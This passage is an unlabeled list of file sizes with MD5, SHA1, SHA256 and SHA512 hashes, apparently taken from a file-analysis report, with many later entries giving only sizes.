SHA14ae1b1747db8c84421aefafb388d33e338de828b
SHA256af239d7bbf1b6bbb0daa8ef37af766c11095a1961eecc33b5a69209af125f665
SHA5126d904cbc55add6a50e8e25102230980fe89b8dbd1edcbe4e7350ec1c7267eabf35234f9d5415d8520d368d7dc2bf8b3750d2993206b9e94f24025df232107cda
-
Filesize
2.9MB
MD59e0eb43cfcb65ae52f4304b35dcde52b
SHA14e40ad5763a85c769485a7f264cb21ad554517d5
SHA2561c1c4f0bd3c80f0428d260e3d9012675013cedb81f7fbd6744a775bf43ccf63b
SHA512e1a33de5d199634a91ebc5180efa54aec13456384c3d0d21a3898d86cf12ea338b67884873eec2b05bceb3abc102346b68555ef90b49070d008fb8b13532879d
-
Filesize
4.1MB
MD5df426d5a216cc431e1da6dcb6f553ac6
SHA1f386a095d508b97f486e7194f1d863a880c8e124
SHA256a5a8c44d1f6850cb49646cebfa1b850bca1e9a6818c78b60b373d3092d1450c0
SHA512cba70913f5939033b69502c333f98a5eb6e6cef6908ca3543b994f5397fd0135dbae3aeb1e88502be6c28e38d96401842734bcd59cc88a7ea1e3b48e3e153aea
-
Filesize
8.6MB
MD532eff1f10471fd5d35bdb40f117ad005
SHA12fee5fef2adcb09c4f93c1b79c31cb9ee0985fa4
SHA2560703a914c90244b0480baeeebd76f63ab3a5bbb7a5d0c33d6fd7d57de095173b
SHA5124533456b332dba951e2c14a24d2717e34637fb46113234137aecab0ccb638bba4867e02b233aec3294dd58d843f4b3360ca76c4e549af4ddc9cec0ca28abc1df
-
Filesize
7.7MB
MD5b958e9af19b4bff677170fdcabc8d822
SHA1175fa24f923a27cc4fa28e24808a2b5cf152fa5d
SHA2565e35fb76140b243d613053795f6c6dd90d47d43adf06bb437398813b11dc1597
SHA5123d5931a4c7f236c4ad74200a5c9c0486ab30f7de0b8401dcb25cb380b83fb389f512ae99f5b928a0ea810c39997bdd3278c72e6fc0ffd60f3b2fe28a065ca43d
-
Filesize
4.0MB
MD59c4d103518d0dc79a435d9679d103361
SHA1888d94b0b71adeaf0d437d510d19dee318026386
SHA256b093f99faaa23fbd81cb1f23964d65b6772631fa3a38a384ae0ccd0b9212d6ec
SHA512389334ac1d68d12485e0a28656bf97c761e5fafa0577ec1595ce3cfee05be517c553c865a1fccabfef42f1c4a71c9cefc0af1660513296c5459c8e7263963a61
-
Filesize
814KB
MD5ed7671fb7df201b409a4d1b46e5e2dee
SHA1e0ccbb2abdde1f247c5a87cce95d6e22499e4ce4
SHA256d4a3a79520f91235895706c253fa62b50342d68dd16426258c69f40eaacc0d28
SHA5123c2848afadf5f39ecd1d3c403f9906c33d660feae1325f931010db5ed67af590f1bb9ea9111e7bfc09ef238c921cfc772010271cdb680c92ea68c96034fc20f6
-
Filesize
3.0MB
MD5cd5f9a43e60c19e3cbfa766ad74da621
SHA1a931b091fa409533c8b6e8f1bfba274206422b6f
SHA256fe01a9470c7082e2e8eec74e377af6eb7eed3d1ba7a6e6030fa06d873864fc07
SHA512ef5492ed39bdfef4c3f1479282da3e053f8dc413f1f0a03e1d1ce9565116719e394b40f326420c56ed672de4067b815e4d27b43c002c234da2b7511c19516057
-
Filesize
23.0MB
MD53bca37bede41925fe33788d175acf69e
SHA11a2a806119836f304857645b624c9afac590c7c7
SHA256315b70e1cf3232743c288ec87301eca0bad47a15432f2957a7cbd89b0a48df96
SHA512a55a8bcd578b20ffa70230e20d3b62cbe62c4a139277dff36902c139675ced0248b0e69a2e734dd2b6052c8fbce17baa6c8a44aa13c33b0ad809b364dc43a18b
-
Filesize
5.4MB
MD559f05ff614f94e77a395a7314af6466c
SHA108639452192e0e7d88c61fdb88c916ea4f513829
SHA256390b51a84435ce7c0312bcce22117c30eb780b846607044fcf34319036236450
SHA512febbb4670ec29063a78d2981b7940d8d19211fe2f9069266199ca935c3a319df22bce6404f3730e0186c472bcfcdaa1cf5de2ad71434a0dc81dcc283e110678b
-
Filesize
44.5MB
MD5789ff8f6cffbe78abccb0fb26cfaa022
SHA168ce0b54788c3b0863b6066b21079cc7c800d984
SHA25661be17b510d6ae2fce45edcdc5ce86ad7a3f3dc1f7bf105d02eecd14b185d631
SHA512368e2f3c7f374965764651e125a6194675e8e17fd2a40b7c1347e47f696ea5618c7acb039f9e260203fe07c0ef757e02de7a5bd372d4dbe62fb28e10ad6ac556
-
Filesize
1.2MB
MD5f288874bd254a6d787d1eda000951836
SHA1dae608ae5a85d1f6496d560f153741ef2727d524
SHA25668c8a97af1fb2336076b8df5603eabff90c7ccc6252cea98bbd43a3c46eba411
SHA512046418a2a691c8cb3f25c7be54be76c39a50f6920fe6378b61fe7b7fbfa964f0b46206d57fdb5fe7d8644f808fe6274e1e2c24608a2bf145cbcf49047e456c2d
-
Filesize
26.0MB
MD5944e141212f095ba54cb194437b4940c
SHA1ea62aabe6f3df7bdd0b797e293a9434f48dae7c6
SHA256d1434a8a4ef7945c0d6d40a4c06e63f06ed790a30efa0d21d404acd342136b98
SHA512a4aca7cad63a7d452bc1525f54a4b24b05d3826cffd40070bf9b5174276f4edcfdd209261a2e5ec452754ba97ba9bfefa1a3310e64c13c39ccfa4d3ea0a191c7
-
Filesize
1019KB
MD5b5173a1f6b89aee43a983e3089b7cc76
SHA18688ed1af315a5375783454cc4fd45651f567345
SHA2561397305677812efe0eb2453ae344a1cdc07e4558622237caa2d70464385b6b84
SHA51251e1ca2dc20b396714c1ebc3b38f87f510cb1e06688c77944243b0423bca3ee4c12b62aa8ca524663e979be2dd10fb179b41d8f2eb252ad4e0a2664722830ad7
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
17.8MB
MD5edcd1255bb63ec279292c9615c676faa
SHA15f6ab20fee9c0e8b1749fedf0813948b168d600f
SHA2569e272ca985e67afbc12f2c103c0155d410f9f470071e9b0a782a04aaf03886f7
SHA512370836a78041f735bd5c6393073cd9aa489372556494c5d8f381922b5f87b51411a070c1dd6929b123b1a42e5b755747cea6a46a745496ad11a5d0ef0e27d6ec
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
32KB
-
Filesize
72KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
364KB